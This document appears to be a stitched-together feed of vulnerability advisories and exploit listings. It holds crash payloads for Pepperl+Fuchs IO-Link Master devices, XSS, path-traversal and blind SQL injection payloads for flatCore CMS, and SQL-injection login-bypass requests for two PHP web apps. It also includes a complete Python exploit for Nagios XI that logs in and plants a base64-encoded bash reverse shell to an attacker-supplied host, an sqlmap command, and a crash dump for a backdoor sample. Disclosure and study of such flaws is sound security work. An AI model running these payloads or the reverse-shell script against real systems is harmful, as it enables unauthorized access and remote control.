4) Null Pointer Dereference / DoS in "discoveryd" (CVE-2020-12514)
Payload for triggering a segmentation fault (caused by a null pointer dereference):
$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x00\x0c\x00\x10\x10" | nc -u $IP 4606

Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb)

Payload for writing ASCII characters in debug mode ("discoveryd -vv"). Register
R4 can be controlled via a byte (filled with value "\xab") also in normal mode
("discoveryd"):
$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63\x73\x65\x63" | nc -u $IP 4606

Program received signal SIGSEGV, Segmentation fault.
0xb6f5dfb4 in strlen () from /lib/libc.so.0
(gdb) i r
r0 0x0 0
r1 0x0 0
r2 0xbefffb9b 3204447131
r3 0x0 0
r4 0xab 171
r5 0x1da 474
r6 0xb6f8dbee 3069762542
r7 0x0 0
r8 0x0 0
r9 0x0 0
r10 0xb6ffef74 3070226292
r11 0xbefff574 3204445556
r12 0xb6f5dfb0 3069566896
sp 0xbefff558 0xbefff558
lr 0xaf9c 44956
pc 0xb6f5dfb4 0xb6f5dfb4 <strlen+4>
cpsr 0xa0000010 -1610612720
fpscr 0x0 0


More bytes than in this payload will lead to another program execution path in
debug mode ("discoveryd -vv").
$ echo -e "\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | nc -u $IP 4606

Other program paths, depending on the current memory, can be triggered with
this payload in debug mode due to printf:
$ echo -e
"\xa9\x8d\xfd\x53\x03\x8a\x7c\x32\x00\x00\x02\x01\x0c\x00\x10\xab\x63\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0
0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
| nc -u $IP 4606

In normal mode, only a null pointer dereference is triggered which leads to a
program crash.


5) Outdated and Vulnerable Software Components
* PHP 5.6.15
* lighttpd 1.4.41
* OpenSSL 1.0.2j
* Linux Kernel 2.6.30
* BusyBox 1.26.2

The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device:

A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
]55;test.txt
#
-------------------------------------------------------------------------------

The vulnerabilities 1), 2), 3) and 4) were manually verified on an emulated
device by using the MEDUSA scalable firmware runtime.


Vulnerable / tested versions:
-----------------------------
The IO-Link Master devices are sharing the same firmware base. The
vulnerabilities were tested on an emulated firmware (system 1.36/ app EIP 1.5.28).

According to the vendor, all firmware versions below 1.5.48 are vulnerable:
IO-Link Master 4-EIP / <=1.5.48
IO-Link Master 8-EIP / <=1.5.48
IO-Link Master 8-EIP-L / <=1.5.48
IO-Link Master DR-8-EIP / <=1.5.48
IO-Link Master DR-8-EIP-P / <=1.5.48
IO-Link Master DR-8-EIP-T / <=1.5.48
IO-Link Master 4-PNIO / <=1.5.48
IO-Link Master 8-PNIO / <=1.5.48
IO-Link Master 8-PNIO-L / <=1.5.48
IO-Link Master DR-8-PNIO / <=1.5.48
IO-Link Master DR-8-PNIO-P / <=1.5.48
IO-Link Master DR-8-PNIO-T / <=1.5.48


Vendor contact timeline:
------------------------
2020-04-30 | Contacting VDE CERT through info@cert.vde.com.
2020-07-29 | Received confirmation from VDE CERT.
2020-07-31 | Call with P+F regarding vulnerabilities from this and another
advisory.
2020-09-29 | Call with Pepperl+Fuchs and CERT@VDE regarding status.
2020-10-02 | Received CVE IDs and preliminary advisory from VDE@CERT.
2020-11-11 | Call with Pepperl+Fuchs regarding the patches. They should be
available within the next two weeks according to P+F. Agreed
with P+F and VDE CERT to release the security advisory next year.
2020-12-14 | Received preliminary advisory from P+F. Set publication date to
2021-01-04.
2021-01-04 | Received final advisory from P+F.
2021-01-13 | Coordinated release of security advisory.


Solution:
---------
Update the firmware to Application 1.6.11 / System 1.52 to resolve the security
issues.

According to Pepperl+Fuchs, the following steps are recommended to be taken:

"In order to prevent the exploitation of the reported vulnerabilities, we
recommend that the affected units be updated with the following three firmware
packages:
- U-Boot bootloader version 1.36 or newer
- System image version 1.52 or newer
- Application base version 1.6.11 or newer

Furthermore, it is always recommended to observe the following measures if the
affected products are connected to public networks:

1. An external protective measure to be put in place.
Traffic from untrusted networks to the device should be blocked by a firewall.
Especially traffic targeting the administration webpage.
2. Device user accounts to be enabled with secure passwords.
If non-trusted people/applications have access to the network that the device
is connected to, then configuring passwords for all three User Accounts
is recommended."

Pepperl+Fuchs advisory page:
https://www.pepperl-fuchs.com/germany/de/29079.htm


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2021


flatCore CMS XSS / File Disclosure / SQL Injection

$
0
0

flatCore CMS versions prior to 2.0.0 build 139 suffer from cross site scripting, file disclosure, and remote SQL injection vulnerabilities.


MD5 | 1fa6af99aeb588403f58ee25830613f4

SEC Consult Vulnerability Lab Security Advisory < 20210113-1 >
=======================================================================
title: Multiple Vulnerabilities
product: flatCore CMS
vulnerable version: < 2.0.0 Build 139
fixed version: Release 2.0.0 Build 139
CVE number: CVE-2021-23835, CVE-2021-23836, CVE-2021-23837, CVE-2021-23838
impact: High
homepage: https://flatcore.org/
found: 2020-11-20
by: Yew Chung Cheah (Office Singapore)
Calvin Phang (Office Singapore)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult, an Atos company
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"flatCore is based on PHP and PDO/SQLite. The Core is as minimalistic as
possible, but can be easily extended by the modular structure. If you are
looking for a solution to edit your website live and with ease, flatCore
may be your buddy."

Source: https://flatcore.org/


Business recommendation:
------------------------
The vendor provides an updated version which should be installed immediately.

An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected from further security issues.


Vulnerability overview/description:
-----------------------------------
1) Reflected Cross-Site Scripting (Authenticated user) (CVE-2021-23838)
A reflected cross-site scripting vulnerability was identified in the 'media_filter'
HTTP request body parameter for the 'acp' interface. The affected parameter
accepts malicious client side script without proper input sanitization. For
example, a malicious user can leverage this vulnerability to steal cookies
from a victim user and perform a session hijacking attack which may then lead to
unauthorized access to the site.

2) Stored Cross-Site Scripting (Authenticated user) (CVE-2021-23836)
A stored cross-site scripting vulnerability was identified in the 'prefs_smtp_psw'
HTTP request body parameter for the 'acp' interface. An admin user can inject
malicious client side script to the affected parameter without any form of
input sanitization. The injected payload will be executed in the browser of a
user whenever one visits the affected module page.

3) Local File Disclosure (Authenticated user) (CVE-2021-23835)
A local file disclosure vulnerability was identified in the 'docs_file'
HTTP request body parameter for the 'acp' interface which can be exploited with
admin access rights. The affected parameter which retrieves the contents of the
specified file was found to be accepting malicious user inputs without proper input
sanitization, thus leading to retrieval of backend server sensitive files, for
example /etc/passwd, sqlite database files, PHP source code etc.

4) Time Based Blind SQL Injection (Authenticated user) (CVE-2021-23837)
A time based blind SQL injection was identified in the 'selected_folder'
HTTP request body parameter for the 'acp' interface. The affected parameter
which retrieves the file contents of the specified folder was found to be
accepting malicious user inputs without proper input sanitization, thus leading
to SQL injection. Database related information can be successfully retrieved.


Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (Authenticated user) (CVE-2021-23838)
An authenticated admin user can exploit this vulnerability by manipulating
the 'media_filter' parameter found in the Files/ Manage Files module.

URL : http://$HOST/acp/acp.php?tn=filebrowser&sub=browse
METHOD : POST
PARAMETER : media_filter
PAYLOAD : aaa%3cscript%3ealert(document.cookie)%3c%2fscript%3ebbb

2) Stored Cross-Site Scripting (Authenticated user) (CVE-2021-23836)
An authenticated admin user can exploit this vulnerability by manipulating
the 'prefs_smtp_psw' parameter found in the System/ E-Mail module.

URL : http://$HOST/acp/acp.php?tn=system&sub=mail
METHOD : POST
PARAMETER : prefs_smtp_psw
PAYLOAD : '%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3eaaabbb

3) Local File Disclosure (Authenticated user) (CVE-2021-23835)
An authenticated admin user can exploit this vulnerability by manipulating
the 'docs_file' parameter found in the help module.

URL : http://$HOST/acp/acp.php
METHOD : POST
PARAMETER : docs_file
PAYLOAD : %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

4) Time Based Blind SQL Injection (Authenticated user) (CVE-2021-23837)
An authenticated admin user can exploit this vulnerability by manipulating
the 'selected_folder' parameter found in the Files/ Manage Files module.

URL : http://$HOST/acp/acp.php?tn=filebrowser&sub=browse
METHOD : POST
PARAMETER : selected_folder
PAYLOAD : %' AND 8483=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'eJQr%'='eJQr


Vulnerable / tested versions:
-----------------------------
flatCore CMS version 2.0.0 (Build 122) has been tested, which was the latest
version available at the time of the test. Previous versions may also be affected.


Vendor contact timeline:
------------------------
2020-12-14 | Contacting vendor through support@flatcore.de
2020-12-17 | Advisory sent to the vendor
2020-12-31 | Requesting status update from vendor
2021-01-05 | Vendor replied that the reported issues have been fixed in
version 2.0.0 (Build 139) released at their official GitHub page
2021-01-13 | Release of security advisory.


Solution:
---------
The fixed version 2.0.0 (Build 139) is available for download at:
https://github.com/flatCore/flatCore-CMS


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Yew Chung Cheah, Calvin Phang / @2021


Online Hotel Reservation 1.0 SQL Injection

$
0
0

Online Hotel Reservation version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | 3b3b96192c21768363de2b321dc24414

# Exploit Title: Online Hotel Reservation 1.0 - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Note: Shout out to boku (Bobby Cooke) for helping me get started on 0day's!!
# Date: 2021-01-13
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit URL: http://TARGET/marimar/admin/index.php
Host: TARGET
POST /marimar/admin/login.php HTTP/1.1
Content-Length: 57
Connection: close
Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616

email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=

Online Movie Streaming 1.0 SQL Injection

$
0
0

Online Movie Streaming version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | 82d3e3b9ac3251037440fca5f40c392d

# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Date: 2021-01-13
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit URL: http://TARGET/onlinemovies/Plogin.php
POST /onlinemovies/Plogin.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://TARGET
Connection: close
Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj
Upgrade-Insecure-Requests: 1

mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=
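
Both bypasses above come from the same defect: the login query is assembled by string concatenation, so a quote closes the literal and `-- ` comments out the password check. The example below is added here and is not code from either application or advisory; it replays the two request bodies against a constructed SQLite table, once through a hypothetical reconstruction of that query pattern and once through a parameterized query. The table name, columns and stored password are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# The two request bodies from the advisories above, copied verbatim.
HOTEL_BODY = "email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin="
MOVIE_BODY = "mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login="


def make_db():
    """Constructed stand-in for the apps' admin table (schema and password are assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (email TEXT, pass TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin@a.com', 'S3cret-example-password')")
    return db


def creds_from_body(body, user_field):
    """Decode a form body the way PHP's $_POST does ('+' becomes a space, %27 a quote)."""
    form = parse_qs(body)
    return form[user_field][0], form["pass"][0]


def build_query(email, password):
    """The concatenated query pattern both advisories target (hypothetical reconstruction)."""
    return ("SELECT COUNT(*) FROM admin WHERE email='" + email
            + "' AND pass='" + password + "'")


def effective_query(email, password):
    """What the database actually evaluates once '-- ' comments out the rest of the line."""
    return build_query(email, password).split("--", 1)[0].rstrip()


def login_vulnerable(db, email, password):
    """Concatenated query: the injected OR 1=1 makes the row count non-zero."""
    try:
        return db.execute(build_query(email, password)).fetchone()[0] > 0
    except sqlite3.Error:
        return False


def login_parameterized(db, email, password):
    """Hardened form: bound values can never close the quote or start a comment."""
    sql = "SELECT COUNT(*) FROM admin WHERE email=? AND pass=?"
    return db.execute(sql, (email, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    for body, field in ((HOTEL_BODY, "email"), (MOVIE_BODY, "mail")):
        email, password = creds_from_body(body, field)
        print(effective_query(email, password))
        print("  concatenated :", login_vulnerable(db, email, password))
        print("  parameterized:", login_parameterized(db, email, password))
```

MySQL only honours `--` as a comment when it is followed by whitespace, which is why both payloads end in `-- -`; SQLite accepts the same form here.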


Nagios XI 5.7.x Remote Code Execution


Nagios XI version 5.7.x authenticated remote code execution exploit.


MD5 | f073a75639db0a35ee5dc80c46f26db4

# Exploit Title: Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)
# Date: 19/12/2020
# Exploit Author: Haboob Team (https://haboob.sa)
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Version: Nagios XI 5.7.x
# Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM
# CVE: CVE-2020-35578

#!/usr/bin/python3

# pip3 install bs4 lxml
import requests
import sys
import warnings
from bs4 import BeautifulSoup
import base64
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if len(sys.argv) != 6:
    print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port")
    print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443")
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

request = requests.session()


def login():
    # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks)
    nsp_str_req = request.get(url+"/nagiosxi/login.php", verify=False)
    content = nsp_str_req.text
    soup = BeautifulSoup(content, "lxml")
    nsp_str = soup.find_all('input')[0].get('value')
    print("[+] Extract login nsp token : %s" % nsp_str)

    # Login
    login_info = {
        "nsp": nsp_str,
        "pageopt": "login",
        "username": username,
        "password": password
    }
    login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False)
    login_text = login_request.text

    # Check Login Status
    if "Core Config Manager" in login_text:
        return True
    else:
        print("[-] Login ... Failed!")
        return False



def execute_payload():
    # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks)
    print("[+] Request upload form ...")
    nsp_str_req = request.get(url+"/nagiosxi/admin/monitoringplugins.php", verify=False)
    content = nsp_str_req.text
    soup = BeautifulSoup(content, "lxml")
    nsp_str = soup.find_all('input')[1].get('value')
    print("[+] Extract upload nsp token : %s" % nsp_str)

    # Payload Base64 Encoding
    payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port)
    payload_bytes = payload_decoded.encode('ascii')
    base64_bytes = base64.b64encode(payload_bytes)
    payload_encoded = base64_bytes.decode('ascii')
    payload = ";echo " + payload_encoded + " | base64 -d | bash;#"
    print("[+] Base64 encoded payload : %s" % payload)

    # Payload Execution
    multipart_form_data = {
        'upload': (None, '', None),
        'nsp': (None, nsp_str, None),
        'uploadedfile': (payload, 'whatever', 'text/plain'),
        'convert_to_unix': (None, '1', None),
    }
    print("[+] Sending payload ...")
    print("[+] Check your nc ...")
    rce = request.post(url +"/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False)



if login():
    print("[+] Login ... Success!")
    execute_payload()


Online Shopping Cart 1.0 SQL Injection


Online Shopping Cart version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | dea39b3434f697b559c641e668911a5e

# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection
# Date: 14.1.2021
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Kali Linux

Use SQLMAP:

sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3

Backdoor.Win32.Ketch.i Remote Stack Buffer Overflow


Backdoor.Win32.Ketch.i malware suffers from a remote stack buffer overflow vulnerability.


MD5 | db079ee4491b3f466c3e96c16dc1b444

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/ee314e1b913a09ec86c63d7186d8f0b8.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Ketch.i
Vulnerability: SEH Remote Stack Buffer Overflow
Description: Ketch makes an HTTP request to port 80 for a file named script.dat; when it processes a server response of 1,612 bytes or more we can trigger an SEH buffer overflow.
Our exploit pattern, if using "AAAAAAAAA", gets XOR'd with the value 30 and converted to 71717171 instead of 41414141, so use "q" for the exploit pattern to obtain 41414141.

The reason is that the input first gets converted so uppercase becomes lowercase and is XOR'd with the value 30. The character "A" becomes "q" (71), so it is difficult to control chars.
Therefore, if we want to see the typical 41414141 exploit pattern, use the lowercase "q" character. Then when 71 (q) gets XOR'd with 30 it becomes 41 (A).

Type: PE32
MD5: ee314e1b913a09ec86c63d7186d8f0b8
Vuln ID: MVID-2021-0024
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/13/2021

Memory Dump:
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(95c.11f0): Stack overflow - code c00000fd (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=773e9d70 esi=000a3848 edi=000a3d0c
eip=773ce916 esp=000a3790 ebp=000a3830 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
ntdll!ZwQueryInformationProcess+0x26:
773ce916 c21400 ret 14h

0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe

FAULTING_IP:
Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8+50f9
004050f9 8802 mov byte ptr [edx],al

EXCEPTION_RECORD: 0019f30c -- (.exr 0x19f30c)
ExceptionAddress: 004050f9 (Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8+0x000050f9)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 001a0000
Attempt to write to address 001a0000

PROCESS_NAME: Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe

ERROR_CODE: (NTSTATUS) 0xc00000fd - A new guard page for the stack cannot be created.

EXCEPTION_CODE: (NTSTATUS) 0xc00000fd - A new guard page for the stack cannot be created.

EXCEPTION_PARAMETER1: 00000001

EXCEPTION_PARAMETER2: 000a2fe8

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAILED_INSTRUCTION_ADDRESS:
+50f9
41414141 ?? ???

CONTEXT: 0019f35c -- (.cxr 0x19f35c)
eax=00000041 ebx=02851dbc ecx=02854285 edx=001a0000 esi=0000064f edi=02853ca0
eip=004050f9 esp=0019f7bc ebp=0019f954 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8+0x50f9:
004050f9 8802 mov byte ptr [edx],al ds:002b:001a0000=41
Resetting default scope

READ_ADDRESS: 41414141

FOLLOWUP_IP:
Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8+50f9
004050f9 8802 mov byte ptr [edx],al

WRITE_ADDRESS: 001a0000

LAST_CONTROL_TRANSFER: from 02852ff0 to 004050f9

FAULTING_THREAD: ffffffff

BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STACK_OVERFLOW_FILL_PATTERN_41414141

IP_ON_HEAP: 02852ff0
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

STACK_TEXT:
0019f7bc 004050f9 backdoor_win32_ketch_i+0x50f9
0019f95c 02852ff0 unknown!unknown+0x0
0019f964 773a2abf ntdll!RtlpAllocateHeap+0xcf

